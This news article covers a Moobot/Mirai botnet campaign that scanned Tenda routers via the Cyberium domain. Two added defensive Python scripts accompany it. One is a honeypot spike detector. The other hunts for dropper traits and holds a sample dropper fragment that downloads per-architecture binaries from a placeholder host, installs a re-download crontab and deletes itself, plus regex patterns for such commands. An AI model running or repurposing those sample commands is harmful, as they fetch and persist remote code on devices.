Alien Labs has observed a spike in activity from Moobot, a Mirai-based botnet, scanning for a flaw in Tenda routers. The scanning traced back to Cyberium, a newly identified cyber-underground malware domain that has recently been tied to a large amount of Mirai-variant activity. However, the researchers could not determine which threat actor was behind the scanning.
According to AT&T Alien Labs, the attackers were scanning for vulnerable Tenda routers that had a remote code-execution (RCE) issue (CVE-2020-10987).
“This spike was observed throughout a significant number of clients, in the space of a few hours,” according to an AT&T analysis, released Monday. “This vulnerability is not commonly used by web scanners and was barely detected by our honeypots during the last six months, except for a minor peak in November.”
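The kind of check behind a statement like that, as an added example (not AT&T's own tooling): a small Python script that buckets honeypot hits for one exploit signature by hour and flags hours that tower over the signature's own baseline. The log format, the signature tag "tenda-rce-cve-2020-10987" and the IP addresses are constructed for the example and are not values from the report.

```python
"""Flag hourly spikes in honeypot hits for one exploit signature.

Added example; it is not code from AT&T Alien Labs. It assumes a
constructed, whitespace-separated honeypot log of the form
    <ISO-8601 UTC timestamp> <source IP> <signature tag>
where the signature tag is whatever label the honeypot assigns to a
matched exploit attempt. The tag "tenda-rce-cve-2020-10987" and the
addresses below are placeholders, not values from the report.
"""
from collections import Counter
from datetime import datetime
from statistics import median

# Constructed sample log: one hit per hour as background noise for the
# Tenda signature, then a burst of eight hits in the 12:00 hour.
SAMPLE_LOG = """\
2021-05-10T00:12:03Z 203.0.113.5 tenda-rce-cve-2020-10987
2021-05-10T03:40:19Z 198.51.100.7 other-scanner
2021-05-10T06:05:44Z 203.0.113.9 tenda-rce-cve-2020-10987
2021-05-10T09:55:01Z 192.0.2.14 other-scanner
2021-05-10T12:17:32Z 203.0.113.21 tenda-rce-cve-2020-10987
2021-05-10T12:17:35Z 203.0.113.22 tenda-rce-cve-2020-10987
2021-05-10T12:18:01Z 203.0.113.23 tenda-rce-cve-2020-10987
2021-05-10T12:18:40Z 203.0.113.24 tenda-rce-cve-2020-10987
2021-05-10T12:21:09Z 203.0.113.25 tenda-rce-cve-2020-10987
2021-05-10T12:25:57Z 203.0.113.26 tenda-rce-cve-2020-10987
2021-05-10T12:31:12Z 203.0.113.27 tenda-rce-cve-2020-10987
2021-05-10T12:44:48Z 203.0.113.28 tenda-rce-cve-2020-10987
2021-05-10T15:02:30Z 203.0.113.9 tenda-rce-cve-2020-10987
2021-05-10T18:48:11Z 203.0.113.5 tenda-rce-cve-2020-10987
"""


def hourly_counts(log_text, signature):
    """Count hits for `signature`, bucketed by the hour they arrived in."""
    counts = Counter()
    for line in log_text.splitlines():
        if not line.strip():
            continue
        stamp, _source, tag = line.split()
        if tag != signature:
            continue
        hour = datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ").replace(minute=0, second=0)
        counts[hour] += 1
    return counts


def find_spikes(counts, factor=5, min_hits=5):
    """Return (hour, hits) pairs where hits exceed `factor` times the median
    of every other hour that saw at least one hit, and also reach `min_hits`.

    Hours with zero hits are absent from `counts`, so the baseline is the
    median of active hours only; that makes the baseline higher, i.e. the
    check more conservative, for a signature that is normally quiet.
    """
    spikes = []
    for hour, hits in sorted(counts.items()):
        others = [n for h, n in counts.items() if h != hour] or [0]
        baseline = max(median(others), 1)
        if hits >= min_hits and hits > factor * baseline:
            spikes.append((hour, hits))
    return spikes


if __name__ == "__main__":
    for hour, hits in find_spikes(hourly_counts(SAMPLE_LOG, "tenda-rce-cve-2020-10987")):
        print(f"spike: {hits} hits in the hour starting {hour:%Y-%m-%d %H:%M}Z")
```

Run over real honeypot data, the same function applied per signature gives exactly the contrast the analysts describe: a signature that barely registers for months, then one hour that stands far above its own median.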
The infrastructure behind the Tenda scans was first discovered in March, and it was also used to scan for additional bugs.
It was also deploying a remote DVR scanner that attempted to install the Sofia video application without authorization.
The malware was dropped onto the compromised devices from that same domain.
“When this domain was investigated, several campaigns were identified, going back at least one year to May 2020,” according to AT&T. “Most of the attacks lasted for approximately a week while they hosted several Mirai variants.”
Each campaign had its own subdomain, which stopped resolving once the campaign was complete.
The campaign would switch between different Mirai variants, with the same URL hosting both Satori and Moobot.
“The actors appear to come back to the same domain with a new subdomain for each new campaign,” researchers explained. “Activity in between campaigns goes quiet to increase the trust of the original domain. Keeping a long-running existing domain while issuing a brand-new subdomain helps to divert attention to the new domain and thus distract from the original.”
After initial unauthorized access to the targeted internet of things (IoT) device, the first request to Cyberium was for a bash script. This script is very similar to the downloaders that were used for Mirai variants, researchers said.
“The script attempts to download a list of filenames (associated with different CPU architectures), executes each one of them, achieves persistence through a crontab that redownloads the bash script itself and finally deletes itself,” according to the analysis.
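A defender can turn that description into a hunting check. The following Python script is an added example, not code from the AT&T report: it scans crontab entries and shell-script text for the traits the analysis lists (a remote fetch, a pipe into a shell or a chmod of the downloaded files, per-architecture file names, a crontab rewrite and self-deletion). The indicator patterns, the sample crontab, the script fragment and the host name malware.example are all constructed placeholders, not IoCs from the report.

```python
"""Hunt for the downloader-script traits described above in crontabs and
shell scripts.

Added example, not code from the AT&T Alien Labs report. The indicator
regexes are heuristics written for this example; the sample crontab, the
script fragment and the host name malware.example are constructed
placeholders, not indicators from the report.
"""
import re

INDICATORS = {
    # fetches content from a remote URL with a common downloader
    "remote_fetch": re.compile(r"\b(?:wget|curl|tftp|ftpget)\b[^\n;|]*(?:https?|ftp|tftp)://\S+"),
    # pipes fetched content straight into a shell
    "pipe_to_shell": re.compile(r"\|\s*(?:ba|da)?sh\b"),
    # marks freshly written files executable (chmod +x, 777, 755, ...)
    "chmod_exec": re.compile(r"\bchmod\s+(?:[ugoa]*\+x|[0-7]*7[0-7]*)\b"),
    # installs a crontab from stdin or from a file ("crontab -l" does not match)
    "crontab_write": re.compile(r"\bcrontab\s+(?:-|\S*/\S+)(?=\s|$)", re.MULTILINE),
    # deletes the running script itself ($0 or ${0})
    "self_delete": re.compile(r"\brm\b[^\n;]*\$(?:0\b|\{0\})"),
}

# CPU architecture names that Mirai-style droppers use as payload file names
ARCH_NAMES = re.compile(
    r"\b(?:arm[5-7]?|mips(?:el)?|x86(?:_64)?|i[3-6]86|sh4|ppc|m68k|sparc|arc)\b")

# Constructed sample crontab: two benign entries and one that re-downloads
# a remote script every ten minutes (placeholder host, not a real IoC).
SAMPLE_CRONTAB = """\
# constructed sample crontab
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * /usr/local/bin/backup.sh >> /var/log/backup.log 2>&1
*/10 * * * * wget -q -O - http://malware.example/update.sh | sh
"""

# Constructed script fragment carrying the described traits (placeholder
# host, not a real IoC); it exists only to exercise the detector.
SAMPLE_SCRIPT = """\
for f in x86 mips mipsel arm7; do
  wget -q http://malware.example/bins/$f -O $f
  chmod +x $f
done
echo '*/10 * * * * wget -q -O - http://malware.example/update.sh | sh' | crontab -
rm -f "$0"
"""


def scan_text(text):
    """Return the set of indicator names that fire on `text`."""
    fired = {name for name, pattern in INDICATORS.items() if pattern.search(text)}
    # three or more distinct architecture names in one script is the
    # "one payload per CPU architecture" trait
    if len(set(ARCH_NAMES.findall(text))) >= 3:
        fired.add("multi_arch")
    return fired


def is_suspicious(fired):
    """A remote fetch combined with any execution, persistence or cleanup
    trait is enough to surface the text for a human to look at."""
    follow_on = {"pipe_to_shell", "chmod_exec", "crontab_write", "self_delete", "multi_arch"}
    return "remote_fetch" in fired and bool(fired & follow_on)


def scan_crontab(crontab_text):
    """Return (entry, sorted indicator names) for each crontab entry worth a look."""
    hits = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fired = scan_text(line)
        if is_suspicious(fired):
            hits.append((line, sorted(fired)))
    return hits


if __name__ == "__main__":
    for entry, fired in scan_crontab(SAMPLE_CRONTAB):
        print(f"crontab entry {entry!r} fired {fired}")
    print("script fragment fired", sorted(scan_text(SAMPLE_SCRIPT)))
```

Legitimate installers also fetch a URL and pipe it into a shell, so treat a hit as something to review rather than something to block; the value of the check is that the full combination (fetch, per-architecture payloads, crontab rewrite, self-deletion) is rare outside droppers of this kind.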
Besides Mirai, attackers relied on Moobot, a bot that uses zero-day exploits to compromise various types of fiber routers as well as Docker APIs, researchers noted. It tries to add devices to a botnet that carries out distributed denial-of-service (DDoS) attacks, much like the Mirai campaign. The main difference between Moobot and other bots is a hardcoded string that is used several times in the code.
“The number of samples Alien Labs has seen with that string has greatly increased in the last months, scattering from the original Moobot sample,” AT&T noted. “This could potentially mean that last year’s Moobot samples were used to create new branches of Mirai variants. However, it did maintain other previously seen characteristics, like a hardcoded list of IP addresses to avoid, such as private ranges, the Department of Defense, IANA IPs, GE, HP and others.”
AT&T has found that Cyberium is still active and has been for the past year or so.